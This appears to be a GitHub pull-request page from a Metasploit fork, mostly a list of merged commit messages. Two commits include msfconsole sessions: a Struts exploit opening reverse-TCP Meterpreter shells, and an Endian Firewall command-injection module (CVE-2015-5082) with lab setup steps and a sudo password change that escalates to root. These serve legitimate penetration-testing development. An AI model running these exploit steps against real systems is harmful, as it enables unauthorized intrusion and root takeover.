Use opts.usage instead of a Table #1

Merged
merged 1 commit into from Oct 22, 2012

Conversation

Projects
None yet
3 participants

jlee-r7 commented Oct 22, 2012

No description provided.

thelightcosine pushed a commit that referenced this pull request Oct 22, 2012

Merge pull request #1 from jlee-r7/dmaloney-r7-findpids
Use opts.usage instead of a Table

@thelightcosine thelightcosine merged commit 4f9385a into thelightcosine:findpids Oct 22, 2012

thelightcosine pushed a commit that referenced this pull request Oct 30, 2012

Merge pull request #1 from todb-r7/metasploit-pcaplog
Loop management, timeouts, and verbosity by todb is full of win

thelightcosine pushed a commit that referenced this pull request Dec 7, 2012

thelightcosine pushed a commit that referenced this pull request Dec 7, 2012

thelightcosine pushed a commit that referenced this pull request Dec 7, 2012

Merge pull request #1 from jvazquez-r7/psexec_command
Psexec command Clenaup.  Works for me, good to go!

thelightcosine pushed a commit that referenced this pull request Dec 7, 2012

thelightcosine pushed a commit that referenced this pull request Jan 28, 2013

thelightcosine pushed a commit that referenced this pull request Jan 28, 2013

thelightcosine pushed a commit that referenced this pull request Jan 28, 2013

Merge pull request #1 from jvazquez-r7/sonicwall_test
assuring stdapi loads on meterpreter

thelightcosine pushed a commit that referenced this pull request Jan 28, 2013

thelightcosine pushed a commit that referenced this pull request Feb 4, 2013

thelightcosine pushed a commit that referenced this pull request Feb 18, 2013

Merge pull request #1 from jvazquez-r7/persistence_vbs
using always a vbs file to drop exe

thelightcosine pushed a commit that referenced this pull request Feb 18, 2013

Merge pull request #1 from jvazquez-r7/devise_clean
This is all just formatting, ref additions, etc.  Nothing substantial so I'll just merge and test as I'm trying to figure out what's up with failing on @rvazquez-r7's app.

thelightcosine pushed a commit that referenced this pull request Mar 25, 2013

Merge pull request #1 from todb-r7/feature/loot-manipulation
Make it clear that you're deleting all loot

thelightcosine pushed a commit that referenced this pull request Mar 25, 2013

thelightcosine pushed a commit that referenced this pull request Apr 16, 2013

Merge pull request #1 from todb-r7/exe_only_patch
Exe only patch : avoid merge conflict and don't use win32pe_only everywhere by default.

thelightcosine pushed a commit that referenced this pull request Apr 16, 2013

Merge pull request #1 from jvazquez-r7/nagios_nrpe_work
cleanup for nagios_nrpe_arguments

thelightcosine pushed a commit that referenced this pull request Apr 16, 2013

Merge pull request #1 from jvazquez-r7/injector_docx_post
testing completed. I see no issues with the proposed changes, tempfiles and quickfile work fine.

thelightcosine pushed a commit that referenced this pull request Apr 16, 2013

thelightcosine pushed a commit that referenced this pull request Apr 16, 2013

thelightcosine pushed a commit that referenced this pull request May 5, 2013

thelightcosine pushed a commit that referenced this pull request May 24, 2013

Merge pull request #1 from wchen-r7/pr1856_target_fix
Fix #1856 - Target selection and swf path

thelightcosine pushed a commit that referenced this pull request May 28, 2013

thelightcosine pushed a commit that referenced this pull request Jun 1, 2013

thelightcosine pushed a commit that referenced this pull request Jun 1, 2013

Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```

thelightcosine pushed a commit that referenced this pull request Jun 27, 2013

Merge pull request #1 from jvazquez-r7/rfcode_work
Final cleanup for rfcode_reader_enum

thelightcosine pushed a commit that referenced this pull request Jun 27, 2013

thelightcosine pushed a commit that referenced this pull request Jul 18, 2013

Merge pull request #1 from jvazquez-r7/instantcms
Improve and clean instantcms_exec

thelightcosine pushed a commit that referenced this pull request Aug 12, 2013

Merge pull request #1 from todb-r7/bug/pr1736-fix-db-import
Handle single quotes for OpenVAS import

thelightcosine pushed a commit that referenced this pull request Aug 12, 2013

thelightcosine pushed a commit that referenced this pull request Aug 24, 2013

Merge pull request #1 from CharlieEriksen/squash-rce
Adding Squash RCE exploit module

thelightcosine pushed a commit that referenced this pull request Sep 9, 2013

Merge pull request #1 from Meatballs1/pr/2270
Refactor and fixes

Added all of Meatball's awesome fixes.

thelightcosine pushed a commit that referenced this pull request Sep 9, 2013

thelightcosine pushed a commit that referenced this pull request Sep 12, 2013

thelightcosine pushed a commit that referenced this pull request Oct 8, 2013

thelightcosine pushed a commit that referenced this pull request Oct 8, 2013

thelightcosine pushed a commit that referenced this pull request Oct 8, 2013

Merge pull request #1 from jvennix-r7/locked_pref_panel_dry
Clean up timeout logic and update description

thelightcosine pushed a commit that referenced this pull request Oct 8, 2013

thelightcosine pushed a commit that referenced this pull request Oct 8, 2013

Merge pull request #1 from todb-r7/land-2414
Disambiguate tape_engine_8A as tape_engine_0x8a

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

Merge pull request #1 from jvazquez-r7/land_2711
Clean php_wordpress_optimizepress

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

Merge pull request #1 from wchen-r7/poison_ivy_ports_check
Add an input check for datastore option PORTS

thelightcosine pushed a commit that referenced this pull request Dec 30, 2013

thelightcosine pushed a commit that referenced this pull request Feb 2, 2014

thelightcosine pushed a commit that referenced this pull request Feb 2, 2014

thelightcosine pushed a commit that referenced this pull request Feb 21, 2014

Merge pull request #1 from tabassassin/retab/pr/2307
Retab/pr/2307 landed as requested.

thelightcosine pushed a commit that referenced this pull request Feb 21, 2014

thelightcosine pushed a commit that referenced this pull request Feb 21, 2014

Merge pull request #1 from jvazquez-r7/review-2801
Review IBM Lotus Sametime modules

thelightcosine pushed a commit that referenced this pull request Apr 11, 2014

Merge pull request #1 from Meatballs1/pr2107
Refactor to common post module

thelightcosine pushed a commit that referenced this pull request Apr 22, 2014

thelightcosine pushed a commit that referenced this pull request Apr 22, 2014

thelightcosine pushed a commit that referenced this pull request Nov 10, 2014

Merge pull request #1 from jhart-r7/landing-4003-jhart
Cleanup.  Sanity check in setup.  vprint

thelightcosine pushed a commit that referenced this pull request Nov 10, 2014

thelightcosine pushed a commit that referenced this pull request Nov 10, 2014

Merge pull request #1 from wvu-r7/pr/4063
Add support for jobs -k ranges from @wvu

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

Merge pull request #1 from jlee-r7/land-2985-pandorafms-sqli
Improvements for PandoraFMS SQLi module

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

Merge pull request #1 from jhart-r7/landing-4229-jhart
Minor Ruby style and module usability cleanup

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

Merge pull request #1 from hmoore-r7/smtp_ntlm_domain
Module cleanup, error handling, and reporting

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

Merge pull request #1 from jhart-r7/landing-4265-jhart
This is a great intermediate approach, thanks @jhart-r7 ! Will verify Pro and msfconsole cases momentarily.

thelightcosine pushed a commit that referenced this pull request Dec 7, 2014

thelightcosine pushed a commit that referenced this pull request Dec 15, 2014

Merge pull request #1 from jvazquez-r7/update_3305
Make Cisco SSL VPN Privilege Escalation landable

thelightcosine pushed a commit that referenced this pull request Dec 15, 2014

Merge pull request #1 from jhart-r7/landing-4328
Minor improvements to actual analyzer ant cookie exploit

thelightcosine pushed a commit that referenced this pull request Dec 15, 2014

Merge pull request #1 from wvu-r7/pr/4361
Merging changes. Thanks for all the help!

thelightcosine pushed a commit that referenced this pull request Jan 30, 2015

Merge pull request #1 from jhart-r7/landing-4503-jhart
Ruby/Metasploit style cleanup of McAfee hashdump module

thelightcosine pushed a commit that referenced this pull request Jan 30, 2015

thelightcosine pushed a commit that referenced this pull request Jan 30, 2015

Merge pull request #1 from jhart-r7/landing-4596-jhart
Improvements to memcached gather module

thelightcosine pushed a commit that referenced this pull request Jan 30, 2015

Merge pull request #1 from jvazquez-r7/rebase_3019
Clean Huawei SOHO router information disclosure

thelightcosine pushed a commit that referenced this pull request Feb 6, 2015

thelightcosine pushed a commit that referenced this pull request Feb 9, 2015

thelightcosine pushed a commit that referenced this pull request Feb 9, 2015

thelightcosine pushed a commit that referenced this pull request Apr 21, 2015

thelightcosine pushed a commit that referenced this pull request Apr 21, 2015

Merge pull request #1 from wvu-r7/pr/5127
Add Privileged to info hash

thelightcosine pushed a commit that referenced this pull request Apr 28, 2015

thelightcosine pushed a commit that referenced this pull request May 12, 2015

Merge pull request #1 from jvazquez-r7/pr_4940
Clean "Updates and new modules for F5 devices"

thelightcosine pushed a commit that referenced this pull request Jun 29, 2015

Merge pull request #1 from wchen-r7/pr5577
Changes for ms15_034_http_sys_memory_dump

thelightcosine pushed a commit that referenced this pull request Aug 5, 2015

Merge pull request #1 from OJ/madmantm-kill-av
Fix killav post module, handle errors, better output

thelightcosine pushed a commit that referenced this pull request Aug 5, 2015

Merge pull request #1 from wchen-r7/pr5788
Properly support detecting target arch and OS

thelightcosine pushed a commit that referenced this pull request Sep 8, 2015

Exploit Module: Endian Firewall Proxy Password Change Command Injection
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)

Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2

Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1

Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.

Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.

Example usage / output:

```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit

[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress -  18.28% done (196/1072 bytes)
[*] Command Stager progress -  36.57% done (392/1072 bytes)
[*] Command Stager progress -  54.85% done (588/1072 bytes)
[*] Command Stager progress -  73.13% done (784/1072 bytes)
[*] Command Stager progress -  91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)

meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer     : efw220.vuln.local
OS           : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie

bash: no job control in this shell
bash-3.00# whoami
root
```

Steps to verify module functionality:

Go to http://sourceforge.net/projects/efw/files/Development/

Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.

Download the ISO file for that version.

Create a VM using the ISO:
  For purposes of VM configuration:
    - Endian is based on the RHEL/CentOS/Fedora Core Linux
	  distribution.
    - The ISOs will create a 32-bit x86 system.
    - 512MB of RAM and 4GB of disk space should be more than enough.
    - Be sure to configure the VM with at least two NICs, as the Endian
      setup is difficult (impossible?) to complete with less than two
      network interfaces on the host.
  For the Endian OS-level (Linux) installation:
    - Default options are fine where applicable.
	- Be sure to pick a valid IP for the "Green" network interface, as
	  you will use it to access a web GUI to complete the configuration
	- If prompted to create a root/SSH password and/or web admin
	  password, make a note of them. Well, make a note of the web admin
	  password - the exploit module will let you change the root
	  password later if you want to. This step is dependent on the
	  version selected - some will prompt, others default the values to
	  "endian".
	- Once the OS-level configuration is complete, access the web
	  interface to complete the setup. If you used 172.16.47.1 for the
	  "Green" interface, then the URL will be
	  https://172.16.47.1:10443/
	- If the web interface is not accessible, reboot the VM (in some
	  versions, the web interface does not come up until after the
	  first post-installation reboot).
  For the web interface-based configuration:
    - If you were prompted to select an admin password, use it. If not,
	  the username/password is admin/endian.
	- Use the second NIC for the "Red" interface. It will not actually
	  be used during this walkthrough, so feel free to specify a bogus
	  address on a different/nonexistent subnet. Same for its default
	  gateway.
	- Once the base configuration is complete, access the main web
	  interface URL again.
	- Switch to the Proxy tab.
	- Enable the HTTP proxy.
	- Click Save (or Apply, depending on version).
	- If prompted to apply the settings, do so.
	- Click on the Authentication sub-tab.
	- Make sure the Authentication Method is Local (this should be the
	  default).
	- Click the _manage users_ (Or _User management_, etc., depending
	  on version) button.
	- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
	- Enter "proxyuser" for the username, and "password123" for the
	  password, or modify the directions below this point accordingly.
	- Click the _Create user_ button.
	- If prompted to apply the settings, do so.

Module test	process:
  From within the MSF console, execute these commands:

    use exploit/linux/http/efw_chpasswd_exec
    set payload linux/x86/meterpreter/reverse_tcp
    set LHOST [YOUR_HOST_IP]
    set LPORT 443
    set RHOST [ENDIAN_GREEN_IP]
    set EFW_USERNAME proxyuser
    set EFW_PASSWORD password123
    exploit

  Once Meterpreter connects, execute the following Meterpreter
  commands:
    getuid
    sysinfo
    shell

  Within the OS shell, execute the following commands:
    whoami
	uname -a
	sudo -l
	sudo /usr/local/bin/chrootpasswd

  It will appear as though the command has hung, but it is actually
  waiting for input. Type "IlikerootaccessandIcannotlie", then press
  enter.

  Execute the following OS command in the shell:
    su

  Type "IlikerootaccessandIcannotlie", then press enter.

  Verify root access (whoami, etc.).

thelightcosine pushed a commit that referenced this pull request Sep 8, 2015

Merge pull request #1 from jlee-r7/newfeature
Add a helper class for doing the geolocation lookup

thelightcosine pushed a commit that referenced this pull request Sep 8, 2015

thelightcosine pushed a commit that referenced this pull request Sep 8, 2015

Merge pull request #1 from jvazquez-r7/review_5722
Code review and cleanup for Busybox PR

thelightcosine pushed a commit that referenced this pull request Oct 5, 2015

Merge pull request #1 from bcook-r7/land-5380-pageantjacker
update pageantjacker to run as part of extapi

thelightcosine pushed a commit that referenced this pull request Nov 3, 2015

Merge pull request #1 from open-security/joomla_contenthistory
rebuild joomla_contenthistory_sqli (cve-2015-7297)

thelightcosine pushed a commit that referenced this pull request Nov 3, 2015

Merge pull request #1 from wvu-r7/pr/6067
Clean up Msf::Sessions::MainframeShell

thelightcosine pushed a commit that referenced this pull request Nov 9, 2015

Merge pull request #1 from jvazquez-r7/review_5720
Fix download of files on linux

thelightcosine pushed a commit that referenced this pull request Nov 30, 2015

Merge pull request #1 from m0t/changes
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)

thelightcosine pushed a commit that referenced this pull request Jan 19, 2016

thelightcosine pushed a commit that referenced this pull request Jan 22, 2016

thelightcosine pushed a commit that referenced this pull request Feb 2, 2016

Merge pull request #1 from wchen-r7/update_6226
Update WordPress XMLRPC Massive Bruteforce

thelightcosine pushed a commit that referenced this pull request Mar 1, 2016

thelightcosine pushed a commit that referenced this pull request Mar 1, 2016

thelightcosine pushed a commit that referenced this pull request Jun 20, 2016

thelightcosine pushed a commit that referenced this pull request Jun 20, 2016

thelightcosine pushed a commit that referenced this pull request Jun 22, 2016

thelightcosine pushed a commit that referenced this pull request Jun 28, 2016

thelightcosine pushed a commit that referenced this pull request Jul 5, 2016

Merge pull request #1 from wvu-r7/pr/6954
Fix some silly things in payload land

thelightcosine pushed a commit that referenced this pull request Sep 12, 2016

thelightcosine pushed a commit that referenced this pull request Sep 28, 2016

thelightcosine pushed a commit that referenced this pull request Sep 28, 2016

Merge pull request #1 from gpapakyriakopoulos/gpapakyriakopoulos-prom…
…pt-fix

Fixed interactive password prompt issue

thelightcosine pushed a commit that referenced this pull request Sep 28, 2016

thelightcosine pushed a commit that referenced this pull request Oct 11, 2016

Merge pull request #1 from interference-security/tnspoision_checker_b…
…ug_fix

Fixed false positive bug in Oracle TNS Listener Checker module

thelightcosine pushed a commit that referenced this pull request Nov 3, 2016

Merge pull request #1 from bwatters-r7/land-7497
Added user logging into the db and humored rubocop

thelightcosine pushed a commit that referenced this pull request Dec 9, 2016

thelightcosine pushed a commit that referenced this pull request Dec 29, 2016

Merge pull request #1 from bwatters-r7/land-7730
Please the rubocop gods (unless they are dumb)

thelightcosine pushed a commit that referenced this pull request Jan 6, 2017

thelightcosine pushed a commit that referenced this pull request Mar 28, 2017

Merge pull request #1 from timwr/pr-7920
fix missing payloads_spec

thelightcosine pushed a commit that referenced this pull request Mar 28, 2017

Merge pull request #1 from wvu-r7/pr/7968
Convert to CmdStager for R7000 exploit

thelightcosine pushed a commit that referenced this pull request Mar 28, 2017

Merge pull request #1 from wvu-r7/pr/8095
Update freesshd_authbypass to use CmdStager fully

thelightcosine pushed a commit that referenced this pull request Mar 28, 2017

thelightcosine pushed a commit that referenced this pull request May 18, 2017

Merge pull request #1 from wchen-r7/pr8394_fix
Pass msftidy for moxa_credentials_recovery.rb

thelightcosine pushed a commit that referenced this pull request Jun 19, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment